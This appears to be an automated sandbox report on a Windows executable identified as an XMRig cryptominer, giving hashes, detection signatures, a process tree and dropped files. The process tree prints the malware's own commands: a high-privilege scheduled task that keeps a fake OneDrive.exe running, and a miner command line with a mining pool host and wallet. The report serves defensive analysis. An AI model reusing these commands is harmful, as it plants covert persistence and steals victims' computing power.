Analysis

  • max time kernel
    4s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-01-2024 04:52

General

  • Target

    67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe

  • Size

    4.3MB

  • MD5

    563f960105584f0430f32774d17a057f

  • SHA1

    554fd82d279fe6e4a660c01ede00a9df3647da93

  • SHA256

    67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128

  • SHA512

    b500a8d51d5b0eef96063517850c191b3f8b99ed72c16342346868e328f1ca2fbff68a91d11ca74268951a21ba57b8e52d655a8ea88cd63bd173ddc8b0d83b3b

  • SSDEEP

    98304:fOteFv2s5wfn7DGumus8G/Mul2rq/aReDkizMeQUp:fOtgv2Tfn/Gbug/Mul2rVe4iwVUp

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
    "C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6FB2.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2464
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
          4⤵
            PID:4228
    • C:\Windows\system32\timeout.exe
      timeout 3
      1⤵
      • Delays execution with timeout.exe
      PID:2780
    • C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
      1⤵
      • Creates scheduled task(s)
      PID:2816
    • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
      C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
      1⤵
        PID:3760
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
          2⤵
            PID:4212
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
              3⤵
              • Creates scheduled task(s)
              PID:4560

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

          Filesize

          85KB

          MD5

          96de4e6275cf432079699895d350fef7

          SHA1

          fc2e902ae5bb1f28abcdb7414f54f1275ed490df

          SHA256

          60c56f7ce6d4ec230d32bac52d26ce9de750f5e26850543eb35785772fe82703

          SHA512

          c3a057f913489d98df53b9d57d82799ac7bdbf4ff5f677a96c199b2f8fb2a434e339e47676fc6c39d58ba6a4d8dcbe4d1002d362e29506360e1bfc57d2b0b560

        • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

          Filesize

          270KB

          MD5

          7ce274017f36643fee873ec117d09dbb

          SHA1

          039b601c85965c4a5fd988a272576108ea05908c

          SHA256

          fa5028cbe9c1bf0e451911dfe99eef1cf6a831661d323af6df507519bf0a532d

          SHA512

          8f0867b2fba6d977b54120c263696d7c1ca0e4b5c8cfea1e76e22e484be305f04e3ee0f80de0c86d7db7479a0c54371ba29db1831b5f145807d54190a38725e0

        • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

          Filesize

          76KB

          MD5

          3f693a58b5821d1c3b775d87e32629c5

          SHA1

          49961b0dd034b02e483a671ce158fd44b8044753

          SHA256

          c9e70d6211984b7d0afad3591b03d42c84cf26dfbc15c958d2d3e134b566fc99

          SHA512

          75257b9f1e48818c0c52bb68b7a64917ee0c35e8e9632eae6a2b2bbd83c637dec4f3d2e3ba88fd4f19f6fe28e79e71ed5f4328477a9904e65e7734d887367cc4

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

          Filesize

          1KB

          MD5

          879faeecba1716ac3ad7bc3662ffb86e

          SHA1

          0f489962ae42883915d16449b881e4eb57ec7f9e

          SHA256

          ca38f4cb9f7b3c256a481fd8c86540558a0d9872ba1fc19181483ea5811ced68

          SHA512

          542c9501d4583b86dfacd89e33c31265f2385cb3461fe41d80aeb83d415c2480144a8371ef23175284645569bec1a1274772d1b640d9fab4d002e78740216966

        • C:\Users\Admin\AppData\Local\Temp\tmp6FB2.tmp.bat

          Filesize

          176B

          MD5

          2c8b65910f9192918888c6bfce13cfa1

          SHA1

          070b3c7f338868b13b332e6eae3ff43aafe2ead5

          SHA256

          262d725ccb39db8fe086853d723b6219fefee4c53594d18444ab3e0d3a0e9470

          SHA512

          69b1bfd4128776023cd4ead39b183f9f242f8bc3d32cd7b631d3f0952b67444f7223bb33c345cacd9c5b40e52939778507da5d6a71fef465ae02ae3652d0e612

        • memory/3760-49-0x00007FF9A9F10000-0x00007FF9AA8FC000-memory.dmp

          Filesize

          9.9MB

        • memory/3760-48-0x000000001CDE0000-0x000000001CDF0000-memory.dmp

          Filesize

          64KB

        • memory/3760-46-0x00007FF9A9F10000-0x00007FF9AA8FC000-memory.dmp

          Filesize

          9.9MB

        • memory/4128-3-0x000000001D5F0000-0x000000001D600000-memory.dmp

          Filesize

          64KB

        • memory/4128-0-0x0000000000EF0000-0x000000000152E000-memory.dmp

          Filesize

          6.2MB

        • memory/4128-10-0x00007FF9A9E00000-0x00007FF9AA7EC000-memory.dmp

          Filesize

          9.9MB

        • memory/4128-2-0x0000000001E90000-0x0000000001E91000-memory.dmp

          Filesize

          4KB

        • memory/4128-1-0x00007FF9A9E00000-0x00007FF9AA7EC000-memory.dmp

          Filesize

          9.9MB

        • memory/4208-14-0x00007FF9A9E00000-0x00007FF9AA7EC000-memory.dmp

          Filesize

          9.9MB

        • memory/4208-16-0x000000001C830000-0x000000001C840000-memory.dmp

          Filesize

          64KB

        • memory/4208-21-0x00007FF9A9E00000-0x00007FF9AA7EC000-memory.dmp

          Filesize

          9.9MB

        • memory/4228-23-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-37-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-29-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-22-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-18-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-17-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-32-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-34-0x000001CF9F090000-0x000001CF9F0B0000-memory.dmp

          Filesize

          128KB

        • memory/4228-33-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-35-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-36-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-28-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-39-0x000001CF9F0B0000-0x000001CF9F0D0000-memory.dmp

          Filesize

          128KB

        • memory/4228-40-0x000001CF9F0D0000-0x000001CF9F0F0000-memory.dmp

          Filesize

          128KB

        • memory/4228-38-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-41-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-42-0x000001CF9F0B0000-0x000001CF9F0D0000-memory.dmp

          Filesize

          128KB

        • memory/4228-43-0x000001CF9F0D0000-0x000001CF9F0F0000-memory.dmp

          Filesize

          128KB

        • memory/4228-26-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-27-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-25-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB

        • memory/4228-24-0x000001CF9EE60000-0x000001CF9EE80000-memory.dmp

          Filesize

          128KB

        • memory/4228-20-0x0000000140000000-0x00000001407DC000-memory.dmp

          Filesize

          7.9MB